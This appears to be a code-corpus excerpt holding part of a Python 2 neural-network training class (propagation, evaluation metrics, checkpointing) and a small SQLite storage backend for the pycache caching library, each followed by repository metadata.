self.batchsize = self.e_op.batchsize
self.train_stop_steps = sys.maxint
def PrintNetwork(self):
for layer in self.layer:
print layer.name
layer.PrintNeighbours()
def DeepCopy(self):
return CopyModel(self.net)
def LoadModelOnGPU(self, batchsize=-1):
"""Load the model on the GPU."""
if batchsize < 0:
if self.t_op:
batchsize=self.t_op.batchsize
else:
batchsize=self.e_op.batchsize
for layer in self.net.layer:
layer.hyperparams.MergeFrom(LoadMissing(layer.hyperparams,
self.net.hyperparams))
if not layer.prefix:
layer.prefix = self.net.prefix
tied_to = None
if layer.tied:
tied_to = next(l for l in self.layer if l.name == layer.tied_to)
self.layer.append(CreateLayer(Layer, layer, self.t_op, tied_to=tied_to))
for edge in self.net.edge:
hyp = deepnet_pb2.Hyperparams()
hyp.CopyFrom(self.net.hyperparams)
hyp.MergeFrom(edge.hyperparams)
edge.hyperparams.MergeFrom(hyp)
try:
node1 = next(layer for layer in self.layer if layer.name == edge.node1)
except StopIteration:
print edge.node1, [l.name for l in self.layer]
node2 = next(layer for layer in self.layer if layer.name == edge.node2)
if not edge.prefix:
edge.prefix = self.net.prefix
tied_to = None
if edge.tied:
tied_to = next(e for e in self.edge if e.node1.name == edge.tied_to_node1 and e.node2.name == edge.tied_to_node2)
self.edge.append(CreateEdge(Edge, edge, node1, node2, self.t_op, tied_to=tied_to))
self.input_datalayer = [node for node in self.layer if node.is_input]
self.output_datalayer = [node for node in self.layer if node.is_output]
self.node_list = self.Sort()
def ExchangeGlobalInfo(self):
for layer in self.layer:
layer.GetGlobalInfo(self)
for edge in self.edge:
edge.GetGlobalInfo(self)
def Sort(self):
"""Topological sort."""
node_list = []
S = [node for node in self.layer if not node.incoming_neighbour]
while S:
n = S.pop()
node_list.append(n)
for m in n.outgoing_edge:
if m.marker == 0:
m.marker = 1
if reduce(lambda a, edge: a and edge.marker == 1,
m.node2.incoming_edge, True):
S.append(m.node2)
if reduce(lambda a, edge: a and edge.marker == 1, self.edge, True):
if self.verbose:
print 'Fprop Order:'
for node in node_list:
print node.name
else:
raise Exception('Invalid net for backprop. Cycle exists.')
return node_list
def ComputeUp(self, layer, train=False, step=0, maxsteps=0):
"""
Computes the state of `layer', given the state of its incoming neighbours.
Args:
layer: Layer whose state is to be computed.
train: True if this computation is happening during training, False during
evaluation.
step: Training step.
maxsteps: Maximum number of steps that will be taken (Needed because some
hyperparameters may depend on this).
"""
layer.dirty = False
perf = None
if layer.is_input or layer.is_initialized:
layer.GetData()
else:
for i, edge in enumerate(layer.incoming_edge):
if edge in layer.outgoing_edge:
continue
inputs = layer.incoming_neighbour[i].state
if edge.conv or edge.local:
if i == 0:
ConvolveUp(inputs, edge, layer.state)
else:
AddConvoleUp(inputs, edge, layer.state)
else:
w = edge.params['weight']
factor = edge.proto.up_factor
if i == 0:
cm.dot(w.T, inputs, target=layer.state)
if factor != 1:
layer.state.mult(factor)
else:
layer.state.add_dot(w.T, inputs, mult=factor)
b = layer.params['bias']
if layer.replicated_neighbour is None:
layer.state.add_col_vec(b)
else:
layer.state.add_dot(b, layer.replicated_neighbour.NN)
layer.ApplyActivation()
if layer.hyperparams.sparsity:
layer.state.sum(axis=1, target=layer.dimsize)
perf = deepnet_pb2.Metrics()
perf.MergeFrom(layer.proto.performance_stats)
perf.count = layer.batchsize
perf.sparsity = layer.dimsize.sum() / layer.dimsize.shape[0]
if layer.hyperparams.dropout:
if train and maxsteps - step >= layer.hyperparams.stop_dropout_for_last:
# Randomly set states to zero.
if layer.hyperparams.mult_dropout:
layer.mask.fill_with_randn()
layer.mask.add(1)
layer.state.mult(layer.mask)
else:
layer.mask.fill_with_rand()
layer.mask.greater_than(layer.hyperparams.dropout_prob)
if layer.hyperparams.blocksize > 1:
layer.mask.blockify(layer.hyperparams.blocksize)
layer.state.mult(layer.mask)
else:
# Produce expected output.
if layer.hyperparams.mult_dropout:
pass
else:
layer.state.mult(1.0 - layer.hyperparams.dropout_prob)
return perf
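# For a plain fully connected layer the loop above computes
#   state = sum_i up_factor_i * W_i^T * input_i + bias
# followed by the layer nonlinearity; a dense numpy sketch (names assumed,
# not part of this API) would be:
#   state = sum(f * np.dot(W.T, x) for f, W, x in incoming_edges) + b
#   state = activation(state)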
def ComputeDown(self, layer, step):
"""Backpropagate through this layer.
Args:
step: The training step. Needed because some hyperparameters depend on
which training step they are being used in.
"""
if layer.is_input: # Nobody to backprop to.
return
# At this point layer.deriv contains the derivative with respect to the
# outputs of this layer. Compute derivative with respect to the inputs.
if layer.is_output:
loss = layer.GetLoss(get_deriv=True)
else:
loss = None
if layer.hyperparams.sparsity:
sparsity_gradient = layer.GetSparsityGradient()
layer.deriv.add_col_vec(sparsity_gradient)
layer.ComputeDeriv()
# Now layer.deriv contains the derivative w.r.t to the inputs.
# Send it down each incoming edge and update parameters on the edge.
for edge in layer.incoming_edge:
if edge.conv or edge.local:
AccumulateConvDeriv(edge.node1, edge, layer.deriv)
else:
self.AccumulateDeriv(edge.node1, edge, layer.deriv)
self.UpdateEdgeParams(edge, layer.deriv, step)
# Update the parameters on this layer (i.e., the bias).
self.UpdateLayerParams(layer, step)
return loss
def AccumulateDeriv(self, layer, edge, deriv):
"""Accumulate the derivative w.r.t the outputs of this layer.
A layer needs to compute derivatives w.r.t its outputs. These outputs may
have been connected to lots of other nodes through outgoing edges.
This method adds up the derivatives contributed by each outgoing edge.
It gets derivatives w.r.t the inputs at the other end of its outgoing edge.
Args:
edge: The edge which is sending the derivative.
deriv: The derivative w.r.t the inputs at the other end of this edge.
"""
if layer.is_input or edge.proto.block_gradient:
return
if layer.dirty: # If some derivatives have already been received.
layer.deriv.add_dot(edge.params['weight'], deriv)
else: # Receiving derivative for the first time.
cm.dot(edge.params['weight'], deriv, target=layer.deriv)
layer.dirty = True
def UpdateEdgeParams(self, edge, deriv, step):
""" Update the parameters associated with this edge.
Update the weights and associated parameters.
Args:
deriv: Gradient w.r.t the inputs at the outgoing end.
step: Training step.
"""
numcases = edge.node1.batchsize
if edge.conv or edge.local:
ConvOuter(edge, edge.temp)
edge.gradient.add_mult(edge.temp, mult=1.0/numcases)
else:
edge.gradient.add_dot(edge.node1.state, deriv.T, mult=1.0/numcases)
if edge.tied_to:
edge.tied_to.gradient.add(edge.gradient)
edge.gradient.assign(0)
edge = edge.tied_to
edge.num_grads_received += 1
if edge.num_grads_received == edge.num_shares:
edge.Update('weight', step)
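# The accumulated weight gradient above is the usual outer-product rule,
#   dW = (1.0 / batchsize) * input * deriv^T,
# summed across tied edges before a single Update call.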
def UpdateLayerParams(self, layer, step):
""" Update the parameters associated with this layer.
Update the bias.
Args:
step: Training step.
"""
layer.gradient.add_sums(layer.deriv, axis=1, mult=1.0 / layer.batchsize)
if layer.tied_to:
layer.tied_to.gradient.add(layer.gradient)
layer.gradient.assign(0)
layer = layer.tied_to
layer.num_grads_received += 1
if layer.num_grads_received == layer.num_shares:
layer.Update('bias', step, no_reg=True) # By default, do not regularize bias.
def ForwardPropagate(self, train=False, step=0):
"""Do a forward pass through the network.
Args:
train: True if the forward pass is done during training, False during
evaluation.
step: Training step.
"""
losses = []
for node in self.node_list:
loss = self.ComputeUp(node, train, step, self.train_stop_steps)
if loss:
losses.append(loss)
return losses
def BackwardPropagate(self, step):
"""Backprop through the network.
Args:
step: Training step.
"""
losses = []
for node in reversed(self.node_list):
loss = self.ComputeDown(node, step)
if loss:
losses.append(loss)
return losses
def TrainOneBatch(self, step):
"""Train once on one mini-batch.
Args:
step: Training step.
Returns:
List of losses incurred at each output layer.
"""
losses1 = self.ForwardPropagate(train=True)
losses2 = self.BackwardPropagate(step)
losses1.extend(losses2)
return losses1
def EvaluateOneBatch(self):
"""Evaluate one mini-batch."""
losses = self.ForwardPropagate()
losses.extend([node.GetLoss() for node in self.output_datalayer])
return losses
def Evaluate(self, validation=True, collect_predictions=False):
"""Evaluate the model.
Args:
validation: If True, evaluate on the validation set,
else evaluate on test set.
collect_predictions: If True, collect the predictions.
"""
step = 0
stats = []
if validation:
stopcondition = self.ValidationStopCondition
stop = stopcondition(step)
if stop or self.validation_data_handler is None:
return
datagetter = self.GetValidationBatch
prefix = 'V'
stats_list = self.net.validation_stats
num_batches = self.validation_data_handler.num_batches
else:
stopcondition = self.TestStopCondition
stop = stopcondition(step)
if stop or self.test_data_handler is None:
return
datagetter = self.GetTestBatch
prefix = 'E'
stats_list = self.net.test_stats
num_batches = self.test_data_handler.num_batches
if collect_predictions:
output_layer = self.output_datalayer[0]
collect_pos = 0
batchsize = output_layer.batchsize
numdims = output_layer.state.shape[0]
predictions = np.zeros((batchsize * num_batches, numdims))
targets = np.zeros(predictions.shape)
while not stop:
datagetter()
losses = self.EvaluateOneBatch()
if collect_predictions:
predictions[collect_pos:collect_pos + batchsize] = \
output_layer.state.asarray().T
targets[collect_pos:collect_pos + batchsize] = \
output_layer.data.asarray().T
collect_pos += batchsize
if stats:
for loss, acc in zip(losses, stats):
Accumulate(acc, loss)
else:
stats = losses
step += 1
stop = stopcondition(step)
if collect_predictions and stats:
predictions = predictions[:collect_pos]
targets = targets[:collect_pos]
MAP, prec50, MAP_list, prec50_list = self.ComputeScore(predictions, targets)
stat = stats[0]
stat.MAP = MAP
stat.prec50 = prec50
for m in MAP_list:
stat.MAP_list.extend([m])
for m in prec50_list:
stat.prec50_list.extend([m])
for stat in stats:
sys.stdout.write(GetPerformanceStats(stat, prefix=prefix))
stats_list.extend(stats)
def ScoreOneLabel(self, preds, targets):
"""Computes Average precision and precision at 50."""
targets_sorted = targets[(-preds.T).argsort().flatten(),:]
cumsum = targets_sorted.cumsum()
prec = cumsum / np.arange(1.0, 1 + targets.shape[0])
total_pos = float(sum(targets))
if total_pos == 0:
total_pos = 1e-10
recall = cumsum / total_pos
ap = np.dot(prec, targets_sorted) / total_pos
prec50 = prec[50]
return ap, prec50
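# Worked example (illustrative): preds = [0.9, 0.8, 0.1], targets = [1, 0, 1]
#   targets sorted by descending score -> [1, 0, 1]
#   cumsum -> [1, 1, 2]; prec -> [1.0, 0.5, 0.667]
#   ap = (1.0*1 + 0.5*0 + 0.667*1) / 2 = 0.833
# Note that prec[50] assumes at least 51 ranked examples, so this helper is
# only meaningful on reasonably large evaluation sets.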
def ComputeScore(self, preds, targets):
"""Computes Average precision and precision at 50."""
assert preds.shape == targets.shape
numdims = preds.shape[1]
ap = 0
prec = 0
ap_list = []
prec_list = []
for i in range(numdims):
this_ap, this_prec = self.ScoreOneLabel(preds[:,i], targets[:,i])
ap_list.append(this_ap)
prec_list.append(this_prec)
ap += this_ap
prec += this_prec
ap /= numdims
prec /= numdims
return ap, prec, ap_list, prec_list
def WriteRepresentationToDisk(self, layernames, output_dir, memory='1G',
dataset='test', drop=False):
layers = [self.GetLayerByName(lname) for lname in layernames]
numdim_list = [layer.state.shape[0] for layer in layers]
if dataset == 'train':
datagetter = self.GetTrainBatch
if self.train_data_handler is None:
return
numbatches = self.train_data_handler.num_batches
size = numbatches * self.train_data_handler.batchsize
elif dataset == 'validation':
datagetter = self.GetValidationBatch
if self.validation_data_handler is None:
return
numbatches = self.validation_data_handler.num_batches
size = numbatches * self.validation_data_handler.batchsize
elif dataset == 'test':
      datagetter = self.GetTestBatch
      if self.test_data_handler is None:
        return
      numbatches = self.test_data_handler.num_batches
      size = numbatches * self.test_data_handler.batchsize
    datawriter = DataWriter(layernames, output_dir, memory, numdim_list, size)
    for batch in range(numbatches):
      datagetter()
      sys.stdout.write('\r%d' % (batch+1))
      sys.stdout.flush()
      self.ForwardPropagate(train=drop)
      reprs = [l.state.asarray().T for l in layers]
      datawriter.Submit(reprs)
    sys.stdout.write('\n')
    return datawriter.Commit()

  def TrainStopCondition(self, step):
    return step >= self.train_stop_steps

  def ValidationStopCondition(self, step):
    return step >= self.validation_stop_steps

  def TestStopCondition(self, step):
    return step >= self.test_stop_steps

  def EvalNow(self, step):
    return step % self.eval_now_steps == 0

  def SaveNow(self, step):
    return step % self.save_now_steps == 0

  def ShowNow(self, step):
    return self.show_now_steps > 0 and step % self.show_now_steps == 0

  def GetLayerByName(self, layername, down=False):
    try:
      l = next(l for l in self.layer if l.name == layername)
    except StopIteration:
      l = None
    return l

  def CopyModelToCPU(self):
    for layer in self.layer:
      layer.SaveParameters()
    for edge in self.edge:
      edge.SaveParameters()

  def ResetBatchsize(self, batchsize):
    self.batchsize = batchsize
    for layer in self.layer:
      layer.AllocateBatchsizeDependentMemory(batchsize)
    for edge in self.edge:
      edge.AllocateBatchsizeDependentMemory()

  def GetBatch(self, handler=None):
    if handler:
      data_list = handler.Get()
      if data_list[0].shape[1] != self.batchsize:
        self.ResetBatchsize(data_list[0].shape[1])
      for i, layer in enumerate(self.datalayer):
        layer.SetData(data_list[i])
    for layer in self.tied_datalayer:
      data = layer.data_tied_to.data
      if data.shape[1] != self.batchsize:
        self.ResetBatchsize(data.shape[1])
      layer.SetData(data)

  def GetTrainBatch(self):
    self.GetBatch(self.train_data_handler)

  def GetValidationBatch(self):
    self.GetBatch(self.validation_data_handler)

  def GetTestBatch(self):
    self.GetBatch(self.test_data_handler)

  def SetUpData(self, skip_outputs=False, skip_layernames=[]):
    """Setup the data."""
    hyp_list = []
    name_list = [[], [], []]
    for node in self.layer:
      if not (node.is_input or node.is_output):
        continue
      if skip_outputs and node.is_output:
        continue
      if node.name in skip_layernames:
        continue
      data_field = node.proto.data_field
      if data_field.tied:
        self.tied_datalayer.append(node)
        node.data_tied_to = next(l for l in self.datalayer\
                                 if l.name == data_field.tied_to)
      else:
        self.datalayer.append(node)
        hyp_list.append(node.hyperparams)
        if data_field.train:
          name_list[0].append(data_field.train)
        if data_field.validation:
          name_list[1].append(data_field.validation)
        if data_field.test:
          name_list[2].append(data_field.test)
    if self.t_op:
      op = self.t_op
    else:
      op = self.e_op
    handles = GetDataHandles(op, name_list, hyp_list,
                             verbose=self.verbose)
    self.train_data_handler = handles[0]
    self.validation_data_handler = handles[1]
    self.test_data_handler = handles[2]

  def SetUpTrainer(self):
    """Load the model, setup the data, set the stopping conditions."""
    self.LoadModelOnGPU()
    if self.verbose:
      self.PrintNetwork()
    self.SetUpData()
    if self.t_op.stopcondition.all_processed:
      num_steps = self.train_data_handler.num_batches
    else:
      num_steps = self.t_op.stopcondition.steps
    self.train_stop_steps = num_steps
    if self.e_op.stopcondition.all_processed and self.validation_data_handler:
      num_steps = self.validation_data_handler.num_batches
    else:
      num_steps = self.e_op.stopcondition.steps
    self.validation_stop_steps = num_steps
    if self.e_op.stopcondition.all_processed and self.test_data_handler:
      num_steps = self.test_data_handler.num_batches
    else:
      num_steps = self.e_op.stopcondition.steps
    self.test_stop_steps = num_steps
    self.eval_now_steps = self.t_op.eval_after
    self.save_now_steps = self.t_op.checkpoint_after
    self.show_now_steps = self.t_op.show_after
    self.ExchangeGlobalInfo()

  def Show(self):
    """Visualize the state of the layers and edges in the network."""
    for layer in self.layer:
      layer.Show()
    for edge in self.edge:
      edge.Show()

  def Train(self):
    """Train the model."""
    assert self.t_op is not None, 't_op is None.'
    assert self.e_op is not None, 'e_op is None.'
    self.SetUpTrainer()
    step = self.t_op.current_step
    stop = self.TrainStopCondition(step)
    stats = []
    collect_predictions = False
    try:
      p = self.output_datalayer[0].proto.performance_stats
      if p.compute_MAP or p.compute_prec50:
        collect_predictions = True
    except Exception as e:
      pass
    select_model_using_error = self.net.hyperparams.select_model_using_error
    select_model_using_acc = self.net.hyperparams.select_model_using_acc
    select_model_using_map = self.net.hyperparams.select_model_using_map
    select_best = select_model_using_error or select_model_using_acc or select_model_using_map
    if select_best:
      best_valid_error = float('Inf')
      test_error = float('Inf')
      best_net = self.DeepCopy()
    dump_best = False
    while not stop:
      sys.stdout.write('\rTrain Step: %d' % step)
      sys.stdout.flush()
      self.GetTrainBatch()
      losses = self.TrainOneBatch(step)
      if stats:
        for acc, loss in zip(stats, losses):
          Accumulate(acc, loss)
      else:
        stats = losses
      step += 1
      if self.ShowNow(step):
        self.Show()
      if self.EvalNow(step):
        # Print out training stats.
        sys.stdout.write('\rStep %d ' % step)
        for stat in stats:
          sys.stdout.write(GetPerformanceStats(stat, prefix='T'))
        self.net.train_stats.extend(stats)
        stats = []
        # Evaluate on validation set.
        self.Evaluate(validation=True, collect_predictions=collect_predictions)
        # Evaluate on test set.
        self.Evaluate(validation=False, collect_predictions=collect_predictions)
        if select_best:
          valid_stat = self.net.validation_stats[-1]
          if len(self.net.test_stats) > 1:
            test_stat = self.net.test_stats[-1]
          else:
            test_stat = valid_stat
          if select_model_using_error:
            valid_error = valid_stat.error / valid_stat.count
            _test_error = test_stat.error / test_stat.count
          elif select_model_using_acc:
            valid_error = 1 - float(valid_stat.correct_preds) / valid_stat.count
            _test_error = 1 - float(test_stat.correct_preds) / test_stat.count
          elif select_model_using_map:
            valid_error = 1 - valid_stat.MAP
            _test_error = 1 - test_stat.MAP
          if valid_error < best_valid_error:
            best_valid_error = valid_error
            test_error = _test_error
            dump_best = True
            self.CopyModelToCPU()
            self.t_op.current_step = step
            self.net.best_valid_stat.CopyFrom(valid_stat)
            self.net.train_stat_es.CopyFrom(self.net.train_stats[-1])
            self.net.test_stat_es.CopyFrom(test_stat)
            best_net = self.DeepCopy()
            best_t_op = CopyOperation(self.t_op)
        #for e in self.edge:
        # sys.stdout.write(' %s %.3f' % (e.name, e.params['weight'].euclid_norm()))
        sys.stdout.write('\n')
      if self.SaveNow(step):
        self.t_op.current_step = step
        self.CopyModelToCPU()
        util.WriteCheckpointFile(self.net, self.t_op)
        if dump_best:
          dump_best = False
          if select_model_using_error:
            print 'Best valid error : %.4f Test error %.4f' % (best_valid_error, test_error)
          elif select_model_using_acc:
            print 'Best valid acc : %.4f Test acc %.4f' % (1-best_valid_error, 1-test_error)
          elif select_model_using_map:
            print 'Best valid MAP : %.4f Test MAP %.4f' % (1-best_valid_error, 1-test_error)
          util.WriteCheckpointFile(best_net, best_t_op, best=True)
      stop = self.TrainStopCondition(step)
| mit | 9,203,731,572,917,769,000 | 33.626437 | 121 | 0.638216 | false |
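The Train() method above follows a standard select-best-on-validation pattern: train in batches, evaluate periodically, and checkpoint whenever the validation error improves. A minimal, self-contained sketch of that pattern under stated assumptions follows; the callables (train_one_batch, evaluate, save_checkpoint) are illustrative placeholders, not names taken from the file above.

def train_with_model_selection(train_one_batch, evaluate, save_checkpoint,
                               num_steps, eval_every):
    # Track the best validation error seen so far; checkpoint only on improvement.
    best_valid_error = float('inf')
    for step in range(1, num_steps + 1):
        train_one_batch(step)
        if step % eval_every == 0:
            valid_error = evaluate()
            if valid_error < best_valid_error:
                best_valid_error = valid_error
                save_checkpoint(step, best=True)
    return best_valid_error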
dibaunaumh/pycache | storage/sqlite.py | 1 | 2363 | __author__ = 'Jake Wharton'
__author_email__ = '[email protected]'
__url__ = 'http://mine.jakewharton.com/projects/show/pycache'
__revision__ = "$Rev$"[6:-2]
__license__ = '''
Copyright 2009 Jake Wharton
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.'''
import sqlite3
from pycache import PyCache
from storage import storage
from time import time
class SQLite(storage):
    def __init__(self, **kwargs):
        if 'file' in kwargs:
            self.file = kwargs['file']
        else:
            self.file = 'PyCache.db'
        self.conn = sqlite3.connect(self.file)
        self.curs = self.conn.cursor()
        if 'table' in kwargs:
            self.table = kwargs['table'] + '_' + PyCache.TABLE
        else:
            self.table = PyCache.TABLE

    def create(self):
        self.curs.execute("CREATE TABLE %s (%s VARCHAR(32) PRIMARY KEY, %s TEXT, %s INTEGER)" % (self.table, PyCache.KEY, PyCache.VALUE, PyCache.EXPIRES))
        self.curs.execute("CREATE INDEX %s_%s ON %s (%s)" % (self.table, PyCache.EXPIRES, self.table, PyCache.EXPIRES))

    def store(self, key, value, expires):
        self.curs.execute("REPLACE INTO %s (%s, %s, %s) VALUES (?, ?, ?)" % (self.table, PyCache.KEY, PyCache.VALUE, PyCache.EXPIRES), (key, value, expires))

    def fetch(self, key):
        self.curs.execute("SELECT %s, %s FROM %s WHERE %s=?" % (PyCache.VALUE, PyCache.EXPIRES, self.table, PyCache.KEY), (key,))
        result = self.curs.fetchone()
        if not result:
            return False
        return {PyCache.VALUE: result[0], PyCache.EXPIRES: int(result[1])}

    def expire(self, key):
        self.curs.execute("REPLACE INTO %s (%s, %s) VALUES (?, ?)" % (self.table, PyCache.KEY, PyCache.EXPIRES), (key, time()))

    def gc(self):
        self.curs.execute("DELETE FROM %s WHERE %s < ?" % (self.table, PyCache.EXPIRES), (time(),))
| apache-2.0 | -1,961,284,187,903,795,500 | 40.473684 | 157 | 0.639018 | false |